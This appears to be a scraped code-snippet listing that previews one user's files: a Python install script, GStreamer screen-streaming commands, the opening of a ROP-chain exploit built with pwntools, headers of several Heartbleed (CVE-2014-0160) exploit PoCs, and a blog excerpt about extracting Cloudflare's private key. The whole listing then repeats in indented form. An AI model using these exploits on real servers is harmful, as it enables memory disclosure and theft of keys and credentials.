esrever10 esrever10

## install-python-2.7.11.sh
#!/bin/bash

sudo apt-get update;
sudo apt-get upgrade;

sudo apt-get install autoconf automake gcc make git;
sudo apt-get install libffi-dev libncurses5-dev openssl patch python-dev python-virtualenv libreadline6-dev libsqlite3-dev libbz2-dev;
sudo apt-get install libsqlite3-dev libbz2-dev libdb5.3-dev tk8.6-dev libncurses5-dev libssl-dev libgdbm-dev;

wget https://launchpad.net/ubuntu/+archive/primary/+files/python2.7_2.7.11.orig.tar.gz;

## gs.sh
# linux send h264 rtp stream:
gst-launch-1.0 -v ximagesrc ! video/x-raw,framerate=20/1 ! videoscale ! videoconvert ! x264enc tune=zerolatency bitrate=500 speed-preset=superfast ! rtph264pay ! udpsink host=127.0.0.1 port=5000

# Macos send h264 rtp stream:
gst-launch-1.0 -v avfvideosrc capture-screen=true ! video/x-raw,framerate=20/1 ! videoscale ! videoconvert ! x264enc tune=zerolatency bitrate=500 speed-preset=superfast ! rtph264pay ! udpsink host=127.0.0.1 port=5000

# receive h264 rtp stream:
gst-launch-1.0 -v udpsrc port=5000 caps = "application/x-rtp, media=(string)video, clock-rate=(int)90000, encoding-name=(string)H264, payload=(int)96" ! rtph264depay ! decodebin ! videoconvert ! autovideosink

## 495_pwn2.py
from pwn import *
from struct import pack

context(arch='i386', os='linux', log_level='debug')
p = ''
p += pack('<I', 0x0806ed0a) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080bb406) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x080a1dad) # mov dword ptr [edx], eax ; ret

## hb-test.py
#!/usr/bin/env python2
"""
Author: takeshix <takeshix@adversec.com>
PoC code for CVE-2014-0160. Original PoC by Jared Stafford (jspenguin@jspenguin.org).

Supportes all versions of TLS and has STARTTLS support for SMTP,POP3,IMAP,FTP and XMPP.
"""

import sys,struct,socket
from argparse import ArgumentParser

## cloudflare_challenge
I wasn't first to get the key. Nor was I second, third, or even fourth. I'm probably not even the
10th to get it (ok, looks like I was the 7th.) But I'm happy that I was able to prove to myself
that I too could do it.

First, I have to admit I was a skeptic. Like the handful of other dissenters, I had initially
believed that it would be highly improbable under normal conditions to obtain the private key
through exploiting Heartbleed. So this was my motivation for participating in Cloudflare's
challenge. I had extracted a lot of other things with Heartbleed, but I hadn't actually set out to
extract private keys. So I wanted to see first-hand if it was possible or not.

## hb4.c
/*
* CVE-2014-0160 heartbleed OpenSSL information leak exploit
* =========================================================
* This exploit uses OpenSSL to create an encrypted connection
* and trigger the heartbleed leak. The leaked information is
* returned encrypted and is then decrypted, decompressed and
* wrote to a file to annoy IDS/forensics.
*
* https://github.com/HackerFantastic/Public/blob/master/exploits/heartbleed.c
* https://raw.githubusercontent.com/decal/ssltest-stls/master/ssltest-stls.py

## hb3.py
#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)

# Modified by Derek Callaway (decal@ethernet.org) to add STARTTLS protocols

# The authors disclaim copyright to this source code.

import sys
import struct

## hb2.c
/*
* CVE-2014-0160 heartbleed OpenSSL information leak exploit
* =========================================================
* This exploit uses OpenSSL to create an encrypted connection
* and trigger the heartbleed leak. The leaked information is
* returned encrypted and is then decrypted, decompressed and
* wrote to a file to annoy IDS/forensics. The exploit can set
* the heatbeart payload length arbitrarily or use two preset
* values for 0x00 and MAX length. The vulnerability occurs due
* to bounds checking not being performed on a heap value which

## hb1.py
#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.

import sys
import struct
import socket
import time
import select

## The broken pedometer.cpp
#include <cstdio>
#include <vector>
#include <bitset>
#include <climits>
#include <iostream>
using namespace std;

#define MAX 15

vector<bitset<MAX> > vec;
	#!/bin/bash

	sudo apt-get update;
	sudo apt-get upgrade;

	sudo apt-get install autoconf automake gcc make git;
	sudo apt-get install libffi-dev libncurses5-dev openssl patch python-dev python-virtualenv libreadline6-dev libsqlite3-dev libbz2-dev;
	sudo apt-get install libsqlite3-dev libbz2-dev libdb5.3-dev tk8.6-dev libncurses5-dev libssl-dev libgdbm-dev;

	wget https://launchpad.net/ubuntu/+archive/primary/+files/python2.7_2.7.11.orig.tar.gz;
	# linux send h264 rtp stream:
	gst-launch-1.0 -v ximagesrc ! video/x-raw,framerate=20/1 ! videoscale ! videoconvert ! x264enc tune=zerolatency bitrate=500 speed-preset=superfast ! rtph264pay ! udpsink host=127.0.0.1 port=5000

	# Macos send h264 rtp stream:
	gst-launch-1.0 -v avfvideosrc capture-screen=true ! video/x-raw,framerate=20/1 ! videoscale ! videoconvert ! x264enc tune=zerolatency bitrate=500 speed-preset=superfast ! rtph264pay ! udpsink host=127.0.0.1 port=5000

	# receive h264 rtp stream:
	gst-launch-1.0 -v udpsrc port=5000 caps = "application/x-rtp, media=(string)video, clock-rate=(int)90000, encoding-name=(string)H264, payload=(int)96" ! rtph264depay ! decodebin ! videoconvert ! autovideosink
	from pwn import *
	from struct import pack

	context(arch='i386', os='linux', log_level='debug')
	p = ''
	p += pack('<I', 0x0806ed0a) # pop edx ; ret
	p += pack('<I', 0x080ea060) # @ .data
	p += pack('<I', 0x080bb406) # pop eax ; ret
	p += '/bin'
	p += pack('<I', 0x080a1dad) # mov dword ptr [edx], eax ; ret
	#!/usr/bin/env python2
	"""
	Author: takeshix <takeshix@adversec.com>
	PoC code for CVE-2014-0160. Original PoC by Jared Stafford (jspenguin@jspenguin.org).

	Supportes all versions of TLS and has STARTTLS support for SMTP,POP3,IMAP,FTP and XMPP.
	"""

	import sys,struct,socket
	from argparse import ArgumentParser
	I wasn't first to get the key. Nor was I second, third, or even fourth. I'm probably not even the
	10th to get it (ok, looks like I was the 7th.) But I'm happy that I was able to prove to myself
	that I too could do it.

	First, I have to admit I was a skeptic. Like the handful of other dissenters, I had initially
	believed that it would be highly improbable under normal conditions to obtain the private key
	through exploiting Heartbleed. So this was my motivation for participating in Cloudflare's
	challenge. I had extracted a lot of other things with Heartbleed, but I hadn't actually set out to
	extract private keys. So I wanted to see first-hand if it was possible or not.
	/*
	* CVE-2014-0160 heartbleed OpenSSL information leak exploit
	* =========================================================
	* This exploit uses OpenSSL to create an encrypted connection
	* and trigger the heartbleed leak. The leaked information is
	* returned encrypted and is then decrypted, decompressed and
	* wrote to a file to annoy IDS/forensics.
	*
	* https://github.com/HackerFantastic/Public/blob/master/exploits/heartbleed.c
	* https://raw.githubusercontent.com/decal/ssltest-stls/master/ssltest-stls.py
	#!/usr/bin/python

	# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)

	# Modified by Derek Callaway (decal@ethernet.org) to add STARTTLS protocols

	# The authors disclaim copyright to this source code.

	import sys
	import struct
	#!/usr/bin/python

	# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
	# The author disclaims copyright to this source code.

	import sys
	import struct
	import socket
	import time
	import select
	#include <cstdio>
	#include <vector>
	#include <bitset>
	#include <climits>
	#include <iostream>
	using namespace std;

	#define MAX 15

	vector<bitset<MAX> > vec;